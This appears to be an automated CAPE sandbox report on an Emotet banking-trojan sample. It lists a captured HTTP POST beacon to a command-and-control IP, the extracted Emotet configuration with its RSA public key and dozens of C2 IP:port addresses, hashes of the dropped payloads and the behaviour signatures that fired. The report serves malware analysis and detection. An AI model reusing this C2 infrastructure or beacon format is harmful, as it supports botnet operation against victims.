No domains contacted.

HTTP Requests

URI Data
http://165.227.156.155:443/window/cookies/tpt/
POST /window/cookies/tpt/ HTTP/1.1
Referer: http://165.227.156.155/window/cookies/tpt/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 165.227.156.155:443
Content-Length: 421
Connection: Keep-Alive
Cache-Control: no-cache

zlY5Slpf6S=a01FhjVPmvaNnto3nfdishVuuOwcXygQbscV7hAx9geeimCjOHkdRzLJsinNH2LxMt7LOSNIWKocoODiB8LTEI1mGnUGtqqgMMamEKqU0LyM8BjkfOvCcRdYmYrU7oyFbPpnjjv3o3RxgAJJShkAATv8LOvaI6GMDiuJ8n77ZfeDupKADvRHuCHZBalqvJWXsw%2BaQ22Xn0MP4ImrXApky%2Bcr4svXfkyvSMh1v%2FNIV8PikBRlbN2QA5qc5Ks8PHrOyklAeHdpuFm4MulYL7%2FIbTSE%2B4NHxdpQvGTUoHqr0a1Phd2NdXoq%2B8E7aRdTQQwJjDHdjbsWkyT%2BJt2TwRNTUaQCfgTwzPEjDwvSs9MebqHGjsW4rYhLck8ki9Ky0PPpqL26wg%3D%3D

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

File name compontitle.exe
Associated Filenames
C:\Windows\SysWOW64\compontitle.exe
File Size 371397 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 4a19c0efa79d514e9003f0fb5abfa93d
SHA1 87c3ebe34ff049e02b24305cf7b6df0dda502a3b
SHA256 d3717429ba31832577c8a24fe89a4be77aa9198f351fa5a2911c95b20c4e9e39
CRC32 42BA7649
Ssdeep 6144:uyojDQSFZbS+pzaSKSa0/fUnt0vJgk2TBsGhw2/K6786TEnCAIpi9MxipEl7BuHh:MDQSzDq0mTMbGW
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
Type Emotet Config
RSA public key
-----BEGIN PUBLIC KEY----- MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAKl4M80uy0jcxUiFIaJJyxgHVVnFtCq6 bi6f2xXPh/XUZNyN8UXDe5HzhTc4kwon9MBZffNwFOIc61QfV3K3YzEI/ktcyNqK LS67ONxsVep769QdiVQJXrIaFjMXKz6viwIDAQAB -----END PUBLIC KEY-----
address
144.76.56.36:8080
78.47.106.72:8080
165.227.156.155:443
192.241.255.77:8080
83.136.245.190:8080
91.205.215.66:8080
190.226.44.20:21
186.75.241.230:80
217.160.182.191:8080
190.145.67.134:8090
86.22.221.170:80
149.202.153.252:8080
80.11.163.139:21
181.31.213.158:8080
183.102.238.69:465
186.4.172.5:8080
104.131.44.150:8080
211.63.71.72:8080
31.172.240.91:8080
115.78.95.230:443
138.201.140.110:8080
192.81.213.192:8080
87.230.19.21:8080
186.4.172.5:443
159.65.25.128:8080
104.131.11.150:8080
86.98.64.189:443
92.222.216.44:8080
67.225.179.64:8080
103.39.131.88:80
37.187.2.199:443
31.12.67.62:7080
191.92.209.110:7080
186.4.172.5:20
104.239.175.211:8080
176.31.200.130:8080
37.157.194.134:443
85.104.59.244:20
5.196.74.210:8080
169.239.182.217:8080
178.210.51.222:8080
212.129.24.79:8080
94.205.247.10:80
182.176.132.213:8090
181.57.193.14:80
78.24.219.147:8080
167.99.105.223:7080
87.106.139.101:8080
62.75.187.192:8080
173.249.47.77:8080
200.71.148.138:8080
178.79.161.166:443
87.106.136.232:8080
152.89.236.214:8080
189.209.217.49:80
190.53.135.159:21
45.33.49.124:443
190.211.207.11:443
144.139.247.220:80
181.143.194.138:443
95.128.43.213:8080
46.105.131.87:80
104.236.246.93:8080
173.212.203.26:8080
192.241.220.155:8080
59.103.164.174:80
167.71.10.37:8080
Download
Type Emotet Payload
Size 65536 bytes
Process nonmanual.exe
PID 1952
Path C:\Users\user\AppData\Local\Temp\nonmanual.exe
MD5 c40cdb635ad21a43ee6a292a243ae04f
SHA1 29970c19d0759c9a116c6e74f8751a75d2ac3836
SHA256 2012de6e914d2fc253cbb96dfb06d081c25b2e9ce0bd3dd59c3918a6169667cc
CRC32 17673F3A
Ssdeep 1536:P2JC6yyC5sySGPukvCh1kscmssU359NstQRk13z5Pn2ESeXv:OJk5ssPuk6km9K5D3g3z5P
Yara None matched
CAPE Yara
  • Emotet
  • Emotet Payload
Download Download ZIP
Type Emotet Payload
Size 72192 bytes
Process nonmanual.exe
PID 1272
Path C:\Users\user\AppData\Local\Temp\nonmanual.exe
MD5 496a700da24d99a88a18e1af20c98a9a
SHA1 237ca6e132d90c9cfe02f65cfd8230b174f5dbb5
SHA256 d11c6216147cd7f871bcc23dad2ec11a6c219c0cba7fe573216c71c5726be123
CRC32 2B08F656
Ssdeep 1536:22JC6yyC5sySGPukvCh1kscmssU359NstQRk13z5Pn2ESeXq:fJk5ssPuk6km9K5D3g3z5P
Yara None matched
CAPE Yara
  • Emotet
  • Emotet Payload
Download Download ZIP
Process Name nonmanual.exe
PID 1952
Dump Size 289280 bytes
Module Path C:\Users\user\AppData\Local\Temp\nonmanual.exe
Type PE image: 32-bit executable
MD5 9a36056acd3e9dbc8e6a512403532355
SHA1 68f056a7bf8b63345542ea651b215d10071b2e46
SHA256 5a30e6abe152f8da87f0fc5b6310e6e14dffc4e06206b82b375fdcd5f72499ac
CRC32 6046627B
Ssdeep 6144:6yojDQSFZAS+pzaSKSa0jfUnv0vJgk2T:QDQSz0M0m
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename 5a30e6abe152f8da87f0fc5b6310e6e14dffc4e06206b82b375fdcd5f72499ac
Process Name compontitle.exe
PID 112
Dump Size 289280 bytes
Module Path C:\Windows\SysWOW64\compontitle.exe
Type PE image: 32-bit executable
MD5 4b2925bf010d513f2673c8bf04e2b654
SHA1 88e4d025b4d5b236f2d27079aee3f1928ce38709
SHA256 7d59fe1ed2ba585e4dad308544a981cf69099ebd5932e8c32ea310e9c915f6f1
CRC32 EACE992C
Ssdeep 6144:6yojDQSFZbS+pzaSKSa0XfUnm0vJgk2T:QDQSzD90m
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename 7d59fe1ed2ba585e4dad308544a981cf69099ebd5932e8c32ea310e9c915f6f1
Process Name nonmanual.exe
PID 1272
Dump Size 289280 bytes
Module Path C:\Users\user\AppData\Local\Temp\nonmanual.exe
Type PE image: 32-bit executable
MD5 73dc4c2e4f998d2caf439fcf730445a7
SHA1 bb580e73f10de98dd0abc4f50268a3a00402e2be
SHA256 6dea593e7f9bc61c241d3e9c01db0181923dcb6063189159a59411a6d0db9910
CRC32 FDCF5A4D
Ssdeep 6144:6yojDQSFZbS+pzaSKSa0bfUnm0vJgk2T:QDQSzDJ0m
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename 6dea593e7f9bc61c241d3e9c01db0181923dcb6063189159a59411a6d0db9910
Process Name explorer.exe
PID 1676
Dump Size 2861568 bytes
Module Path C:\Windows\explorer.exe
Type PE image: 64-bit executable
MD5 2c7acd0d30696ad195ae6784726eeb2b
SHA1 362ec1b6833c91c178b2bd04911a331aed1134f5
SHA256 27689d8eb1257ca5a884941dbc3f59ab0b9831bc68b7bd9df33057a62a614af7
CRC32 7134BC56
Ssdeep 49152:9xrceI/lIRYraisQhFCUF9vYYYYYYYYYYYRYYYYYYYYYYE3iA7/eFUJN9ojoso2W:PrcPlIWxvYYYYYYYYYYYRYYYYYYYYYY4
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename 27689d8eb1257ca5a884941dbc3f59ab0b9831bc68b7bd9df33057a62a614af7
Process Name compontitle.exe
PID 912
Dump Size 289280 bytes
Module Path C:\Windows\SysWOW64\compontitle.exe
Type PE image: 32-bit executable
MD5 2a3496f9e19b7b56c11e91705558815e
SHA1 39c84e576586a586a58fb7a84e5e793ef22cd862
SHA256 61887b003770338b05e4986a8615543994f825d1203a96d79a0c8de5461c74bf
CRC32 9430148C
Ssdeep 6144:6yojDQSFZbS+pzaSKSa0jfUnZ0vJgk2T:QDQSzD+0m
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename 61887b003770338b05e4986a8615543994f825d1203a96d79a0c8de5461c74bf

Comments



No comments posted

Processing ( 8.167 seconds )

  • 3.447 CAPE
  • 2.696 ProcDump
  • 0.739 BehaviorAnalysis
  • 0.295 Static
  • 0.281 Dropped
  • 0.242 NetworkAnalysis
  • 0.242 TargetInfo
  • 0.102 TrID
  • 0.094 Deduplicate
  • 0.022 Strings
  • 0.006 AnalysisInfo
  • 0.001 Debug

Signatures ( 0.938 seconds )

  • 0.553 antidbg_windows
  • 0.039 antiav_detectreg
  • 0.031 NewtWire Behavior
  • 0.031 decoy_document
  • 0.03 antivm_vbox_window
  • 0.029 api_spamming
  • 0.023 antisandbox_script_timer
  • 0.011 ransomware_files
  • 0.009 infostealer_ftp
  • 0.008 Doppelganging
  • 0.008 injection_createremotethread
  • 0.008 InjectionCreateRemoteThread
  • 0.008 antianalysis_detectreg
  • 0.008 antiav_detectfile
  • 0.007 injection_runpe
  • 0.007 ransomware_extensions
  • 0.006 InjectionProcessHollowing
  • 0.006 antivm_generic_disk
  • 0.006 persistence_autorun
  • 0.005 InjectionInterProcess
  • 0.005 antidebug_guardpages
  • 0.005 exploit_heapspray
  • 0.005 infostealer_im
  • 0.005 infostealer_mail
  • 0.004 stealth_file
  • 0.004 mimics_filetime
  • 0.004 virus
  • 0.004 antivm_vbox_keys
  • 0.003 tinba_behavior
  • 0.003 bootkit
  • 0.003 rat_nanocore
  • 0.003 stack_pivot
  • 0.003 antivm_generic_scsi
  • 0.003 reads_self
  • 0.003 antianalysis_detectfile
  • 0.003 antivm_vbox_files
  • 0.002 betabot_behavior
  • 0.002 kibex_behavior
  • 0.002 vawtrak_behavior
  • 0.002 cerber_behavior
  • 0.002 hancitor_behavior
  • 0.002 antivm_parallels_keys
  • 0.002 antivm_vmware_keys
  • 0.002 browser_security
  • 0.002 infostealer_bitcoin
  • 0.002 masquerade_process_name
  • 0.002 recon_fingerprint
  • 0.001 malicious_dynamic_function_loading
  • 0.001 hawkeye_behavior
  • 0.001 network_tor
  • 0.001 antivm_vbox_libs
  • 0.001 exploit_getbasekerneladdress
  • 0.001 recon_programs
  • 0.001 antivm_generic_services
  • 0.001 antiemu_wine_func
  • 0.001 shifu_behavior
  • 0.001 infostealer_browser_password
  • 0.001 ursnif_behavior
  • 0.001 dynamic_function_loading
  • 0.001 kovter_behavior
  • 0.001 stealth_timeout
  • 0.001 antidbg_devices
  • 0.001 antivm_generic_diskreg
  • 0.001 antivm_vmware_files
  • 0.001 antivm_xen_keys
  • 0.001 ketrican_regkeys
  • 0.001 geodo_banking_trojan
  • 0.001 darkcomet_regkeys
  • 0.001 disables_browser_warn
  • 0.001 modify_uac_prompt

Reporting ( 0.048 seconds )

  • 0.045 SubmitCAPE
  • 0.003 CompressResults
Task ID 115348
Mongo ID 5de5f8cda04cefe70a3b0996
Cuckoo release 1.3-CAPE
Delete